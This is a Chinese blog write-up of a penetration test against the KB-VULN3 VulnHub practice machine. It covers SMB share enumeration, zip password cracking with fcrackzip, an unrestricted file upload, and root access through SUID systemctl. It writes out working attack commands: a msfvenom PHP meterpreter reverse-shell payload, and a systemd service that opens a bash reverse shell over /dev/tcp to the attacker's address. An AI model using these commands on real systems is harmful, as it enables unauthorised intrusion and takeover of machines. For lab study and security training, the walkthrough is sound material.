KB-VULN3靶机总结

文章讲述了对KB-VULN3靶机进行渗透测试的过程,首先通过nmap扫描发现开放的22、80、139和445端口,然后利用139和445端口的Samba后门漏洞,找到可利用的Files共享文件夹。通过fcrackzip工具破解zip密码,获取网站源代码,进一步利用网站的无防护文件上传功能,上传php反弹shell,最终通过systemctl的suid权限提升至root。
摘要由CSDN通过智能技术生成

KB-VULN3靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/kbvuln/KB-VULN3.ova

  1. 打开靶机,将网络连接模式改成NAT,然后使用namp扫描端口,发现没有ip,利用网上搜索出来的方法,修改了靶机在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 再次使用namp扫描了网段之后,发现了ip和打开的端口
    可以看到,开放了22端口,80端口,139端口和445端口
    在这里插入图片描述

  3. 先根据80端口打开网站,就是这样一个页面,什么功能也没有在这里插入图片描述

  4. 在目录扫描一波,看看目录下有没有可以利用的网站
    结果是除了首页,没有其它网页了
    在这里插入图片描述

  5. 一般我们的渗透测试都是利用网站的漏洞,但是这里似乎网站没有可以利用的地方
    那我们换个角度,它开放了4个端口,22端口和80端口是我们所熟知的,但是这个445和139端口,以往渗透靶机也没怎么有看见过,很有可能这里就是突破口,因此我百度了一下445端口和139端口的漏洞利用,还真发现一个

    139和445的Samba后门漏洞
    网站: https://cloud.tencent.com/developer/article/1079631?ivk_sa=1024320u

  6. 根据百度的结果,试验了一下,发现的确存在445端口漏洞,存在一个共享文件夹Files
    并且提示都是HACK ME ,证明我们的思路是对的在这里插入图片描述
    这里也可以用enum4linux 192.168.11.139
    也可以扫出共享文件Files在这里插入图片描述
    在这里插入图片描述
    然后可以直接使用smbclient 来查看共享文件夹,百度的那个方法使用完后会多出个rootfs文件,但是也打不开那个,权限不够在这里插入图片描述
    那么主要就是这个website.zip文件,根据名字,猜测是网站相关
    想办法打开这个文件,这里利用网上搜索的方法,使用get命令,下载到本地主机

    在这里插入图片描述

    解压需要密码
    在这里插入图片描述
    网上的方法都是爆破,使用一个工具fcrackzip
    kali没有这个工具,先安装在这里插入图片描述
    这个工具使用的字典是kali自带的/usr/share/wordlists/rockyou.txt
    这里需要先解压下在这里插入图片描述
    在这里插入图片描述
    然后使用

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u website.zip
    

    在这里插入图片描述
    打开之后是sitemagic目录和readme.txt在这里插入图片描述
    readme.txt给出了一个网站域名,还有账户密码在这里插入图片描述
    sitemagic目录里面是这个在这里插入图片描述

  7. 我们先改下域名在这里插入图片描述
    通过域名打开网站
    在这里插入图片描述

  8. 先利用给出的账户密码登录一下在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  9. 接下来我们查看这个网站是否存在可以利用的漏洞,发现存在一个文件上传的功能点在这里插入图片描述在这里插入图片描述
    并且发现,没有防护,可以直接上传任意文件,这里测试一个php文件
    在这里插入图片描述
    抓包看了下文件路径在这里插入图片描述
    是我写的hello没错在这里插入图片描述

  10. 可以访问之后就简单了,上传一个php的反弹shell,利用msf获得shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o /home/kali/Desktop/shell.php
    

    在这里插入图片描述
    上传上去
    在这里插入图片描述
    先利用msf开启监听在这里插入图片描述
    再访问shell.php在这里插入图片描述
    成功获得shell
    在这里插入图片描述

  11. 紧接着考虑提权,sudo无法提权,计划任务无法使用,passwd无法写入,然后suid提权,发现存在一个systemctl,可以使用suid提权在这里插入图片描述
    在提权网站上https://gtfobins.github.io/ 找到systemctl的suid提权

    sudo install -m =xs $(which systemctl) .
    TF=$(mktemp).service
    echo '[Service]
    Type=oneshot
    ExecStart=/bin/sh -c "id > /tmp/output"
    [Install]
    WantedBy=multi-user.target' > $TF
    ./systemctl link $TF
    ./systemctl enable --now $TF
    

    在这里插入图片描述
    首先编写一个service 文件,让开启服务的时候反弹到kali的7777端口

    [Service]
    Type=oneshot
    ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.131/7777 0>&1'
    
    [Install]
    WantedBy=multi-user.target
    

    在这里插入图片描述
    然后上传到网站的某个目录下,这里上传一个一句话木马,就可以连接到蚁剑了,方便上传文件,但是提权还是用msf,比较稳定在这里插入图片描述
    创建服务

    systemctl link /var/www/html/sitemagic/shell.service
    

    在这里插入图片描述
    本地开启7777端口监听在这里插入图片描述
    然后开启这个服务

    systemctl start shell.service
    

    在这里插入图片描述
    成功获得root的shell在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值